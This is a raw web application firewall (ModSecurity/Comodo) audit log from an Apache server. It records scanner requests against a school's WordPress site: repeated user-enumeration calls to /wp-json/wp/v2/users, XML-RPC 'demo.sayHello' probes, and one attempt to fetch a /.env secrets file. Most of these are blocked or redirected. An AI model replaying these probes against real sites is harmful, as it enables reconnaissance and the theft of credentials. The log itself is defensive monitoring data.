Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a650e279-Z-- --d310b96b-A-- [10/May/2025:09:08:20 +0700] aB61FBLuBiaF9R054QBbJgAAABc 103.236.140.4 54042 103.236.140.4 8181 --d310b96b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.79.144 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.79.144 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d310b96b-C-- demo.sayHello --d310b96b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d310b96b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746842900628539 6485 (- - -) Stopwatch2: 1746842900628539 6485; combined=4664, p1=636, p2=3786, p3=40, p4=43, p5=96, sr=80, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d310b96b-Z-- --4d6fe71f-A-- [10/May/2025:09:16:52 +0700] aB63FBLuBiaF9R054QBbMwAAABY 103.236.140.4 54088 103.236.140.4 8181 --4d6fe71f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 27.147.156.118 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 27.147.156.118 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --4d6fe71f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4d6fe71f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746843412854862 3496 (- - -) Stopwatch2: 1746843412854862 3496; combined=1546, p1=553, p2=956, p3=0, p4=0, p5=37, sr=144, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4d6fe71f-Z-- --55dbdb1c-A-- [10/May/2025:09:22:12 +0700] aB64VBLuBiaF9R054QBbOwAAAAo 103.236.140.4 54130 103.236.140.4 8181 --55dbdb1c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 171.7.2.58 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 171.7.2.58 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --55dbdb1c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --55dbdb1c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746843732244638 3391 (- - -) Stopwatch2: 1746843732244638 3391; combined=1503, p1=482, p2=977, p3=0, p4=0, p5=43, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --55dbdb1c-Z-- --2bb81949-A-- [10/May/2025:09:48:13 +0700] aB6-bdr9PbfRBMhzxmRbAgAAAEo 103.236.140.4 54374 103.236.140.4 8181 --2bb81949-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 159.223.132.86 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 159.223.132.86 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --2bb81949-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2bb81949-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746845293536927 817 (- - -) Stopwatch2: 1746845293536927 817; combined=344, p1=309, p2=0, p3=0, p4=0, p5=35, sr=124, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2bb81949-Z-- --f6b64148-A-- [10/May/2025:10:05:52 +0700] aB7CkBLuBiaF9R054QBbpwAAABg 103.236.140.4 54600 103.236.140.4 8181 --f6b64148-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 113.199.192.25 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 113.199.192.25 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --f6b64148-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f6b64148-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746846352884553 2510 (- - -) Stopwatch2: 1746846352884553 2510; combined=1157, p1=393, p2=735, p3=0, p4=0, p5=29, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f6b64148-Z-- --821cb001-A-- [10/May/2025:10:19:24 +0700] aB7FvKuC4AqLGUOyzyX8AgAAAJc 103.236.140.4 54666 103.236.140.4 8181 --821cb001-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.137.128 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.137.128 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --821cb001-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --821cb001-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746847164963077 2893 (- - -) Stopwatch2: 1746847164963077 2893; combined=1272, p1=453, p2=787, p3=0, p4=0, p5=32, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --821cb001-Z-- --22af1c7d-A-- [10/May/2025:10:19:29 +0700] aB7FwRLuBiaF9R054QBbrgAAABA 103.236.140.4 54670 103.236.140.4 8181 --22af1c7d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.137.128 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.137.128 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --22af1c7d-C-- demo.sayHello --22af1c7d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --22af1c7d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746847169725652 5143 (- - -) Stopwatch2: 1746847169725652 5143; combined=3840, p1=467, p2=3169, p3=34, p4=29, p5=83, sr=65, sw=58, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --22af1c7d-Z-- --c61b8e2d-A-- [10/May/2025:10:20:38 +0700] aB7GBhLuBiaF9R054QBbsgAAABM 103.236.140.4 54690 103.236.140.4 8181 --c61b8e2d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.240.99.187 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.240.99.187 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --c61b8e2d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c61b8e2d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746847238870619 2699 (- - -) Stopwatch2: 1746847238870619 2699; combined=1443, p1=462, p2=950, p3=0, p4=0, p5=31, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c61b8e2d-Z-- --7efbd479-A-- [10/May/2025:10:20:44 +0700] aB7GDMi6w7GTj2w44Z6cWAAAAM8 103.236.140.4 54694 103.236.140.4 8181 --7efbd479-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.240.99.187 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.240.99.187 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --7efbd479-C-- demo.sayHello --7efbd479-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --7efbd479-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746847244039504 5374 (- - -) Stopwatch2: 1746847244039504 5374; combined=3999, p1=528, p2=3259, p3=28, p4=32, p5=90, sr=75, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7efbd479-Z-- --3916235c-A-- [10/May/2025:10:20:48 +0700] aB7GEBLuBiaF9R054QBbtAAAABY 103.236.140.4 54698 103.236.140.4 8181 --3916235c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.111.193 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.111.193 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3916235c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3916235c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746847248645859 2653 (- - -) Stopwatch2: 1746847248645859 2653; combined=1179, p1=420, p2=723, p3=0, p4=0, p5=36, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3916235c-Z-- --6c51ea5b-A-- [10/May/2025:10:20:54 +0700] aB7GFhLuBiaF9R054QBbtgAAABg 103.236.140.4 54702 103.236.140.4 8181 --6c51ea5b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.111.193 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.111.193 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6c51ea5b-C-- demo.sayHello --6c51ea5b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6c51ea5b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746847254738246 5610 (- - -) Stopwatch2: 1746847254738246 5610; combined=4143, p1=544, p2=3408, p3=28, p4=31, p5=78, sr=80, sw=54, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6c51ea5b-Z-- --3fea9f0d-A-- [10/May/2025:10:22:54 +0700] aB7GjhLuBiaF9R054QBbuQAAAAQ 103.236.140.4 54732 103.236.140.4 8181 --3fea9f0d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.39.97 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.39.97 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3fea9f0d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3fea9f0d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746847374147728 2778 (- - -) Stopwatch2: 1746847374147728 2778; combined=1237, p1=441, p2=766, p3=0, p4=0, p5=30, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3fea9f0d-Z-- --1c57f736-A-- [10/May/2025:10:23:06 +0700] aB7GmhLuBiaF9R054QBbvQAAAAc 103.236.140.4 54742 103.236.140.4 8181 --1c57f736-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.39.97 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.39.97 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --1c57f736-C-- demo.sayHello --1c57f736-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --1c57f736-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746847386419731 6760 (- - -) Stopwatch2: 1746847386419731 6760; combined=4793, p1=606, p2=3934, p3=38, p4=44, p5=101, sr=75, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1c57f736-Z-- --120e397f-A-- [10/May/2025:10:23:37 +0700] aB7GuRLuBiaF9R054QBbvwAAAAs 103.236.140.4 54754 103.236.140.4 8181 --120e397f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.84.1 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.84.1 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --120e397f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --120e397f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746847417207704 2988 (- - -) Stopwatch2: 1746847417207704 2988; combined=1260, p1=420, p2=805, p3=0, p4=0, p5=35, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --120e397f-Z-- --e367903e-A-- [10/May/2025:10:23:43 +0700] aB7GvxLuBiaF9R054QBbwAAAAA4 103.236.140.4 54758 103.236.140.4 8181 --e367903e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.84.1 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.84.1 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e367903e-C-- demo.sayHello --e367903e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e367903e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746847423807620 5380 (- - -) Stopwatch2: 1746847423807620 5380; combined=4060, p1=501, p2=3343, p3=30, p4=32, p5=92, sr=72, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e367903e-Z-- --4aa97a56-A-- [10/May/2025:10:23:45 +0700] aB7Gwdr9PbfRBMhzxmRbHQAAAE8 103.236.140.4 54760 103.236.140.4 8181 --4aa97a56-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 45.202.76.108 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.76.108 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4aa97a56-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4aa97a56-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746847425496543 2065 (- - -) Stopwatch2: 1746847425496543 2065; combined=992, p1=346, p2=603, p3=0, p4=0, p5=43, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4aa97a56-Z-- --e039f969-A-- [10/May/2025:10:23:52 +0700] aB7GyBLuBiaF9R054QBbwgAAABI 103.236.140.4 54766 103.236.140.4 8181 --e039f969-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.202.76.108 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.76.108 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e039f969-C-- demo.sayHello --e039f969-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e039f969-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746847432006623 4626 (- - -) Stopwatch2: 1746847432006623 4626; combined=3600, p1=425, p2=2978, p3=24, p4=27, p5=87, sr=67, sw=59, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 